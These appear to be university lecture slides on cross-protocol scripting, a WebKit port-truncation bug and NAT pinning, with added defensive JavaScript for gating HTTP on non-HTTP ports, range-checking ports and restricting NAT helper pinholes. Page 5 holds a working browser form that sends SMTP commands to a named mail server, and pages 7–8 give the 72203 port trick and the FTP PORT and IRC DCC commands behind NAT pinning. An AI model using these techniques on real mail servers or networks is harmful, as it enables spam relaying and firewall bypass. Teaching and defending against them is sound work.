IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.
Page 1
IT Security
Cross Protocol Scripting & NAT Pinning
Emanuel Klein
Page 2
Motivation
• Defcon 18 videos on YouTube
• "How I met your girlfriend"
• by Samy Kamkar
• http://www.youtube.com/watch?v=fEmO7wQKCMw
• Contents:
  • PHP 160-bit session variable reduced to 40 bits
  • Cross Protocol Scripting (XPS)
  • NAT Pinning
  • WebKit integer overflow
  • Geolocation via XXXSS
Page 3
Cross Protocol Scripting (XPS)
HTTP is a newline protocol
The browser is an HTTP client (\n-delimited lines from client to server)
HTTP server on port 80, 443, 8080, ????
Other newline protocols: SMTP, FTP, IRC
Page 4
The browser as an arbitrary client
SMTP: for sending spam
IRC: for sending spam -> NAT Pinning
FTP -> NAT Pinning
Page 5
The JavaScript client
var doc = document.createElement("form");
doc.setAttribute("name", "x");
doc.setAttribute("method", "POST"); // GET naturally does not work
doc.setAttribute("action", "http://mail.fhstp.ac.at:25/"); // server + port
doc.setAttribute("enctype", "multipart/form-data"); // preserves newlines!
var payload = document.createElement("textarea");
payload.setAttribute("name", "C");
// The actual content
var data = "HELO\nMAIL FROM:<[email protected]>\nRCPT TO:<[email protected]>\nDATA\nSubject: Raketenfuzzys\nKeep up the good work!\n.\n\nQUIT";
payload.setAttribute("value", data);
payload.innerHTML = data;
payload.innerText = data;
doc.appendChild(payload);
document.body.appendChild(doc);
doc.submit(); // send
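What a line-oriented server receives when a form like the one on this slide is submitted, and the simplest server-side defence against it, as an added example that is not part of the slides or of Samy Kamkar's demo. The stream, host name and addresses are constructed. Current browsers refuse to navigate or POST to port 25 at all (it is on the Fetch standard's bad-port list), so the example concentrates on the server side: a strict server rejects the session on its first line, while a lenient server that answers unknown commands with 500 and carries on ends up interpreting the embedded SMTP verbs.

```javascript
// Added example (not from the slides): what an SMTP server sees when a browser
// submits a multipart/form-data POST to port 25, and two server behaviours.
// All sample lines are constructed.

// The raw stream as it arrives on port 25: an HTTP request whose body carries
// SMTP commands. multipart/form-data does not URL-encode the textarea value,
// so the "\n" separators survive. Content-Length is not computed here; the
// servers simulated below never look at it.
const SAMPLE_STREAM = [
  "POST / HTTP/1.1",
  "Host: mail.example.test:25",
  "Content-Type: multipart/form-data; boundary=----xps",
  "Content-Length: 0",
  "",
  "------xps",
  'Content-Disposition: form-data; name="C"',
  "",
  "HELO",
  "MAIL FROM:<sender@example.test>",
  "RCPT TO:<victim@example.test>",
  "DATA",
  "Subject: constructed sample",
  "Keep up the good work!",
  ".",
  "",
  "QUIT",
  "------xps--",
  "",
].join("\r\n");

const HTTP_METHODS = new Set(["GET", "POST", "PUT", "HEAD", "OPTIONS", "DELETE", "PATCH", "CONNECT", "TRACE"]);
const SMTP_VERBS = new Set(["HELO", "EHLO", "MAIL", "RCPT", "DATA", "RSET", "NOOP", "QUIT", "STARTTLS", "AUTH", "VRFY"]);

// "<METHOD> <target> HTTP/x.y" is never a valid command in SMTP, IRC or FTP.
function looksLikeHttpRequestLine(line) {
  const parts = line.trim().split(/\s+/);
  return parts.length === 3 && HTTP_METHODS.has(parts[0]) && /^HTTP\/\d\.\d$/.test(parts[2]);
}

// Strict server (or an IDS in front of it): decide on the very first line,
// before any verb inside the body can be interpreted.
function gateSession(rawStream) {
  const first = rawStream.split(/\r?\n/)[0];
  if (looksLikeHttpRequestLine(first)) {
    return { verdict: "reject", reason: "HTTP request line on a non-HTTP port", line: first };
  }
  return { verdict: "accept", line: first };
}

// Lenient server: answers every unknown line with "500 unrecognized command"
// and keeps the session open, so the verbs buried in the HTTP body run.
// This only counts what such a server would interpret; it sends nothing.
function simulateLenientServer(rawStream) {
  const accepted = [];
  let unknown = 0;
  let inData = false;
  for (const line of rawStream.split(/\r?\n/)) {
    if (inData) {
      if (line === ".") inData = false; // end of message body
      continue;
    }
    const verb = line.split(/[\s:]/)[0].toUpperCase();
    if (SMTP_VERBS.has(verb)) {
      accepted.push(verb);
      if (verb === "DATA") inData = true;
    } else {
      unknown++;
    }
  }
  return { accepted, unknown };
}
```

`gateSession` is the check worth having on any line-oriented service that can be reached from a browser; `simulateLenientServer` exists only to show why a forgiving parser is the other half of the problem: every HTTP header and multipart boundary line is just an "unrecognized command" to it, and the SMTP verbs behind them are executed as if typed by a real client.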
Page 6
Demo
Page 7
WebKit integer overflow
IRC port 6667: 6667 = 0001 1010 0000 1011; 72203 = 1 0001 1010 0000 1011
Browser check: if port != 6667 then connect(hostname, port)
TCP/UDP ports are only 16 bits wide; the 17th bit is simply truncated!
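The check from this slide in the order that made it bypassable, next to a version that validates the value the socket will actually use, as an added example that is not WebKit's code. BAD_PORTS is a constructed subset of the ports browsers refuse; the real list is the Fetch standard's bad-port list, which also covers the SMTP and FTP ports the XPS slides use.

```javascript
// Added example (not from the slides): port blocklist checked before vs. after
// 16-bit truncation. BAD_PORTS is a constructed subset for the demonstration.
const BAD_PORTS = new Set([21, 25, 6667]); // FTP, SMTP, IRC

// Ports are 16 bits on the wire; everything above bit 15 is silently dropped.
function toWirePort(port) {
  return port & 0xffff;
}

// Vulnerable order: the blocklist is compared against the caller's number,
// then the socket layer truncates. 72203 passes the check and becomes 6667.
function connectDecisionBuggy(port) {
  if (BAD_PORTS.has(port)) return { allowed: false, wirePort: null, reason: "blocked port" };
  return { allowed: true, wirePort: toWirePort(port) };
}

// Fixed order: refuse anything that is not a valid 16-bit port up front and
// compare the blocklist against the value that will actually be used.
function connectDecisionFixed(port) {
  if (!Number.isInteger(port) || port < 0 || port > 0xffff) {
    return { allowed: false, wirePort: null, reason: "not a 16-bit port" };
  }
  const wirePort = toWirePort(port);
  if (BAD_PORTS.has(wirePort)) return { allowed: false, wirePort, reason: "blocked port" };
  return { allowed: true, wirePort };
}

// Bit-level view matching the slide: the 17th bit is the only difference.
function toBits(n, width) {
  return n.toString(2).padStart(width, "0");
}
```

The fix is not a bigger blocklist but a range check on the untrusted integer before it is narrowed: any value outside 0..65535 is rejected, and the blocklist is consulted on the exact value handed to the socket.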
Page 8
NAT Pinning
SOHO routers and firewalls are ALGs
They inspect and interpret the Layer 7 payload
Examples:
IRC/DCC:
PRIVMSG target :DCC target $IP $PORT
Netfilter IRC conntrack
FTP PORT command:
PORT ip1,ip2,ip3,ip4,p1,p2
Implementation-dependent!
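The two Layer 7 commands named on this slide, parsed the way a NAT helper has to parse them, plus a strict pinhole policy of the kind the slide calls implementation-dependent, as an added example that is not Netfilter's conntrack code. Sample lines and addresses are constructed. The strict policy stops a spoofed third-party address and denies a configured set of ports; it cannot distinguish a pinning attempt that advertises the victim's own address from a legitimate transfer, which is why the last slide asks whether the ALG is needed at all.

```javascript
// Added example (not from the slides): ALG-style parsing of FTP PORT and IRC
// DCC, and a strict decision on whether to open a NAT pinhole. Constructed data.

function parseFtpPort(line) {
  // RFC 959: PORT h1,h2,h3,h4,p1,p2   (port = p1 * 256 + p2)
  const m = /^PORT\s+(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\s*$/i.exec(line.trim());
  if (!m) return null;
  const o = m.slice(1, 7).map(Number);
  if (o.some((x) => x > 255)) return null;
  return { proto: "ftp", ip: o.slice(0, 4).join("."), port: o[4] * 256 + o[5] };
}

function parseIrcDcc(line) {
  // PRIVMSG target :\x01DCC CHAT chat <ip as 32-bit decimal> <port>\x01
  // (DCC SEND carries a file name in place of "chat"; same address layout)
  const m = /^PRIVMSG\s+\S+\s+:\x01?DCC\s+(?:CHAT|SEND)\s+\S+\s+(\d+)\s+(\d+)/i.exec(line);
  if (!m) return null;
  const n = Number(m[1]);
  if (n > 0xffffffff) return null;
  const ip = [n >>> 24, (n >>> 16) & 255, (n >>> 8) & 255, n & 255].join(".");
  return { proto: "irc", ip, port: Number(m[2]) };
}

function parseAlgCommand(line) {
  return parseFtpPort(line) || parseIrcDcc(line);
}

// Strict helper policy: only pinhole to the address of the client that sent
// the command, only on an unprivileged port, never on a port denied by policy.
// denyPorts is a constructed default; a real deployment sets its own.
function pinholeDecision(clientIp, line, denyPorts = new Set([22, 25, 6667])) {
  const cmd = parseAlgCommand(line);
  if (!cmd) return { open: false, reason: "no ALG command" };
  if (cmd.ip !== clientIp) return { open: false, reason: "advertised IP differs from client", cmd };
  if (cmd.port < 1024) return { open: false, reason: "privileged port", cmd };
  if (denyPorts.has(cmd.port)) return { open: false, reason: "port denied by policy", cmd };
  return { open: true, cmd };
}
```

A helper that skips the address comparison is the "loose" behaviour: it will open a pinhole to whatever address the payload names. Even the strict version above still trusts the payload to tell it which port to open, so on a network where no FTP or DCC transfers are expected the sound configuration is to not load the helper.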
Page 9
What do we learn from this?
Browser:
Use a current browser (patch, browsers too!)
NoScript?
Firewall:
Rethink the rules
Do I need / have I enabled ALG functionality?
Host-based firewalls
Page 10
Thank you for your attention!